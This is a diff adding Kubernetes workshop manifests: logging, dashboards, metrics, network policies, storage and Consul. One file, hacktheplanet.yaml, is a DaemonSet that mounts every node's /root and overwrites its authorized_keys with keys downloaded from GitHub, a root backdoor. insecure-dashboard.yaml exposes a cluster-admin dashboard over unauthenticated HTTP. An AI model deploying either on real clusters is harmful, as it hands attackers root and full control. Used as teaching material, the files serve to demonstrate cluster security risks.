  namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
spec:
  replicas: 1
  template:
    metadata:
      labels:
        name: elasticsearch-operator
    spec:
      containers:
      - name: operator
        image: upmcenterprises/elasticsearch-operator:0.2.0
        imagePullPolicy: Always
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 8000
          name: http
        livenessProbe:
          httpGet:
            path: /live
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 10
        readinessProbe:
          httpGet:
            path: /ready
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 5
      serviceAccount: elasticsearch-operator
k8s/filebeat.yaml (new file)
@@ -0,0 +1,167 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.config:
      inputs:
        # Mounted `filebeat-inputs` configmap:
        path: ${path.config}/inputs.d/*.yml
        # Reload inputs configs as they change:
        reload.enabled: false
      modules:
        path: ${path.config}/modules.d/*.yml
        # Reload module configs as they change:
        reload.enabled: false

    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      hints.enabled: true

    processors:
      - add_cloud_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-inputs
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  kubernetes.yml: |-
    - type: docker
      containers.ids:
      - "*"
      processors:
        - add_kubernetes_metadata:
            in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
spec:
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat-oss:7.0.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch-es.default.svc.cluster.local
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: inputs
          mountPath: /usr/share/filebeat/inputs.d
          readOnly: true
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: inputs
        configMap:
          defaultMode: 0600
          name: filebeat-inputs
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
---
k8s/grant-admin-to-dashboard.yaml (new file)
@@ -0,0 +1,14 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
  labels:
    k8s-app: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system
k8s/hacktheplanet.yaml (new file)
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
k8s/haproxy.cfg (new file)
@@ -0,0 +1,18 @@
global
    daemon
    maxconn 256

defaults
    mode tcp
    timeout connect 5000ms
    timeout client 50000ms
    timeout server 50000ms

frontend the-frontend
    bind *:80
    default_backend the-backend

backend the-backend
    server google.com-80 google.com:80 maxconn 32 check
    server ibm.fr-80 ibm.fr:80 maxconn 32 check
16
k8s/haproxy.yaml
Normal file
16
k8s/haproxy.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
apiVersion: v1
kind: Pod
metadata:
  name: haproxy
spec:
  volumes:
  - name: config
    configMap:
      name: haproxy
  containers:
  - name: haproxy
    image: haproxy
    volumeMounts:
    - name: config
      mountPath: /usr/local/etc/haproxy/
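The pod above mounts a ConfigMap named haproxy that this diff never creates; presumably it is built from k8s/haproxy.cfg first. A hedged sketch of that setup step:

```bash
# Hypothetical setup: the official haproxy image reads /usr/local/etc/haproxy/haproxy.cfg,
# which is exactly where the ConfigMap key (haproxy.cfg) lands via the volume mount.
kubectl create configmap haproxy --from-file=k8s/haproxy.cfg
kubectl apply -f k8s/haproxy.yaml
```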
k8s/ingress.yaml (Normal file, 14 lines)
@@ -0,0 +1,14 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: cheddar
spec:
  rules:
  - host: cheddar.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: cheddar
          servicePort: 80
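A.B.C.D in the host rule is a placeholder for a node's IP address; nip.io then resolves cheddar.A.B.C.D.nip.io back to that address. One possible substitution, assuming the first node's InternalIP is the address you want (use ExternalIP on clouds where that differs):

```bash
IP=$(kubectl get nodes -o jsonpath='{.items[0].status.addresses[?(@.type=="InternalIP")].address}')
sed "s/A\.B\.C\.D/$IP/" k8s/ingress.yaml | kubectl apply -f -
```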
k8s/insecure-dashboard.yaml (Normal file, 220 lines)
@@ -0,0 +1,220 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>

# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kube-system
type: Opaque

---
# ------------------- Dashboard Service Account ------------------- #

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Role & Role Binding ------------------- #

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
rules:
  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["create"]
  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["create"]
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
  verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["kubernetes-dashboard-settings"]
  verbs: ["get", "update"]
  # Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
  resources: ["services"]
  resourceNames: ["heapster"]
  verbs: ["proxy"]
- apiGroups: [""]
  resources: ["services/proxy"]
  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
apiVersion: apps/v1beta2
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
      - name: kubernetes-dashboard
        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
        ports:
        - containerPort: 8443
          protocol: TCP
        args:
          - --auto-generate-certificates
          # Uncomment the following line to manually specify Kubernetes API server Host
          # If not specified, Dashboard will attempt to auto discover the API server and connect
          # to it. Uncomment only if the default does not work.
          # - --apiserver-host=http://my-address:port
        volumeMounts:
        - name: kubernetes-dashboard-certs
          mountPath: /certs
          # Create on-disk volume to store exec logs
        - mountPath: /tmp
          name: tmp-volume
        livenessProbe:
          httpGet:
            scheme: HTTPS
            path: /
            port: 8443
          initialDelaySeconds: 30
          timeoutSeconds: 30
      volumes:
      - name: kubernetes-dashboard-certs
        secret:
          secretName: kubernetes-dashboard-certs
      - name: tmp-volume
        emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule

---
# ------------------- Dashboard Service ------------------- #

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  selector:
    matchLabels:
      app: dashboard
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
        image: alpine
        name: dashboard
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: dashboard
  type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
  labels:
    k8s-app: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system
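The three extra objects after the stock manifest (Deployment, NodePort Service, ClusterRoleBinding) are what make this dashboard "insecure": a socat relay exposes the HTTPS-only dashboard over plain HTTP, with cluster-admin rights. A sketch of finding the allocated port:

```bash
kubectl apply -f k8s/insecure-dashboard.yaml
NODEPORT=$(kubectl get svc dashboard -o jsonpath='{.spec.ports[0].nodePort}')
echo "Dashboard exposed (insecurely!) on http://<any-node-address>:$NODEPORT"
```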
k8s/just-a-pod.yaml (Normal file, 10 lines)
@@ -0,0 +1,10 @@
apiVersion: v1
kind: Pod
metadata:
  name: hello
  namespace: default
spec:
  containers:
  - name: hello
    image: nginx
k8s/kaniko-build.yaml (Normal file, 29 lines)
@@ -0,0 +1,29 @@
apiVersion: v1
kind: Pod
metadata:
  name: kaniko-build
spec:
  initContainers:
  - name: git-clone
    image: alpine
    command: ["sh", "-c"]
    args:
    - |
      apk add --no-cache git &&
      git clone git://github.com/jpetazzo/container.training /workspace
    volumeMounts:
    - name: workspace
      mountPath: /workspace
  containers:
  - name: build-image
    image: gcr.io/kaniko-project/executor:latest
    args:
    - "--context=/workspace/dockercoins/rng"
    - "--insecure"
    - "--destination=registry:5000/rng-kaniko:latest"
    volumeMounts:
    - name: workspace
      mountPath: /workspace
  volumes:
  - name: workspace
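The init container clones this very repository into a shared volume; Kaniko then builds dockercoins/rng and pushes it to an in-cluster registry assumed to answer at registry:5000. Following the build is just a matter of tailing the container's logs:

```bash
kubectl apply -f k8s/kaniko-build.yaml
kubectl logs kaniko-build -c build-image --follow
```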
k8s/kubernetes-dashboard.yaml (Normal file, 167 lines)
@@ -0,0 +1,167 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>

# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kube-system
type: Opaque

---
# ------------------- Dashboard Service Account ------------------- #

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Role & Role Binding ------------------- #

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
rules:
  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["create"]
  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["create"]
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
  verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["kubernetes-dashboard-settings"]
  verbs: ["get", "update"]
  # Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
  resources: ["services"]
  resourceNames: ["heapster"]
  verbs: ["proxy"]
- apiGroups: [""]
  resources: ["services/proxy"]
  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
apiVersion: apps/v1beta2
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
      - name: kubernetes-dashboard
        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
        ports:
        - containerPort: 8443
          protocol: TCP
        args:
          - --auto-generate-certificates
          # Uncomment the following line to manually specify Kubernetes API server Host
          # If not specified, Dashboard will attempt to auto discover the API server and connect
          # to it. Uncomment only if the default does not work.
          # - --apiserver-host=http://my-address:port
        volumeMounts:
        - name: kubernetes-dashboard-certs
          mountPath: /certs
          # Create on-disk volume to store exec logs
        - mountPath: /tmp
          name: tmp-volume
        livenessProbe:
          httpGet:
            scheme: HTTPS
            path: /
            port: 8443
          initialDelaySeconds: 30
          timeoutSeconds: 30
      volumes:
      - name: kubernetes-dashboard-certs
        secret:
          secretName: kubernetes-dashboard-certs
      - name: tmp-volume
        emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule

---
# ------------------- Dashboard Service ------------------- #

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
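This is the stock v1.8.3 dashboard: HTTPS only, no NodePort, no extra privileges. The usual way to reach it in this setup is through the API server proxy:

```bash
kubectl apply -f k8s/kubernetes-dashboard.yaml
kubectl proxy &
# Then browse to:
echo "http://localhost:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/"
```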
k8s/local-path-storage.yaml (Normal file, 110 lines)
@@ -0,0 +1,110 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
  namespace: local-path-storage
rules:
- apiGroups: [""]
  resources: ["nodes", "persistentvolumeclaims"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["endpoints", "persistentvolumes", "pods"]
  verbs: ["*"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
  namespace: local-path-storage
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.8
        imagePullPolicy: Always
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
      - name: config-volume
        configMap:
          name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
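Because the StorageClass uses volumeBindingMode: WaitForFirstConsumer, a claim stays Pending until a pod actually references it. A minimal sketch of exercising the provisioner; the claim name and size here are made up for the example:

```bash
kubectl apply -f k8s/local-path-storage.yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: test-local-path
spec:
  storageClassName: local-path
  accessModes: [ ReadWriteOnce ]
  resources: { requests: { storage: 100Mi } }
EOF
```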
k8s/metrics-server.yaml (Normal file, 138 lines)
@@ -0,0 +1,138 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: system:aggregated-metrics-reader
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: metrics-server-auth-reader
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  service:
    name: metrics-server
    namespace: kube-system
  group: metrics.k8s.io
  version: v1beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: metrics-server
  namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    k8s-app: metrics-server
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  template:
    metadata:
      name: metrics-server
      labels:
        k8s-app: metrics-server
    spec:
      serviceAccountName: metrics-server
      volumes:
      # mount in tmp so we can safely use from-scratch images and/or read-only containers
      - name: tmp-dir
        emptyDir: {}
      containers:
      - name: metrics-server
        image: k8s.gcr.io/metrics-server-amd64:v0.3.1
        imagePullPolicy: Always
        volumeMounts:
        - name: tmp-dir
          mountPath: /tmp
        args:
        - --kubelet-preferred-address-types=InternalIP
        - --kubelet-insecure-tls
        - --metric-resolution=5s

---
apiVersion: v1
kind: Service
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    kubernetes.io/name: "Metrics-server"
spec:
  selector:
    k8s-app: metrics-server
  ports:
  - port: 443
    protocol: TCP
    targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:metrics-server
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
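The --metric-resolution=5s flag makes metrics show up quickly, which is handy in a workshop. Once the APIService is registered and the first scrape has happened, the standard kubectl top commands should work:

```bash
kubectl apply -f k8s/metrics-server.yaml
# Give it a minute, then:
kubectl top nodes
kubectl top pods --all-namespaces
```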
k8s/netpol-allow-testcurl-for-testweb.yaml (Normal file, 14 lines)
@@ -0,0 +1,14 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-testcurl-for-testweb
spec:
  podSelector:
    matchLabels:
      app: testweb
  ingress:
  - from:
    - podSelector:
        matchLabels:
          run: testcurl
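The policy admits traffic from pods labeled run=testcurl, a label that kubectl run derives from the resource name. A hedged test, assuming a testweb pod and service exist as in the matching deny-all exercise below:

```bash
# busybox wget times out unless the policy lets the traffic through:
kubectl run testcurl --rm -it --restart=Never --image=alpine -- \
    wget -qO- --timeout=5 http://testweb
```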
k8s/netpol-deny-all-for-testweb.yaml (Normal file, 10 lines)
@@ -0,0 +1,10 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-all-for-testweb
spec:
  podSelector:
    matchLabels:
      app: testweb
  ingress: []
k8s/netpol-dockercoins.yaml (Normal file, 22 lines)
@@ -0,0 +1,22 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-from-other-namespaces
spec:
  podSelector:
    matchLabels:
  ingress:
  - from:
    - podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-webui
spec:
  podSelector:
    matchLabels:
      app: webui
  ingress:
  - from: []
k8s/nginx-with-volume.yaml (Normal file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-volume
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
  restartPolicy: OnFailure
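The git container populates the shared www volume and exits (hence restartPolicy: OnFailure); the www volume is declared without a type, presumably relying on the default emptyDir behavior. A quick check, run from a machine that can reach pod IPs (e.g. a cluster node):

```bash
kubectl apply -f k8s/nginx-with-volume.yaml
IP=$(kubectl get pod nginx-with-volume -o jsonpath='{.status.podIP}')
curl http://$IP/   # should return the cloned Spoon-Knife index page
```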
k8s/persistent-consul.yaml (Normal file, 95 lines)
@@ -0,0 +1,95 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
k8s/portworx.yaml (Normal file, 580 lines)
@@ -0,0 +1,580 @@
# SOURCE: https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true
apiVersion: v1
kind: ConfigMap
metadata:
  name: stork-config
  namespace: kube-system
data:
  policy.cfg: |-
    {
      "kind": "Policy",
      "apiVersion": "v1",
      "extenders": [
        {
          "urlPrefix": "http://stork-service.kube-system.svc:8099",
          "apiVersion": "v1beta1",
          "filterVerb": "filter",
          "prioritizeVerb": "prioritize",
          "weight": 5,
          "enableHttps": false,
          "nodeCacheCapable": false
        }
      ]
    }
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: stork-account
  namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: stork-role
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "delete"]
- apiGroups: [""]
  resources: ["persistentvolumes"]
  verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
  resources: ["persistentvolumeclaims"]
  verbs: ["get", "list", "watch", "update"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["list", "watch", "create", "update", "patch"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "list", "watch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
  resources: ["volumesnapshots"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
  resources: ["volumesnapshotdatas"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
  resources: ["configmaps"]
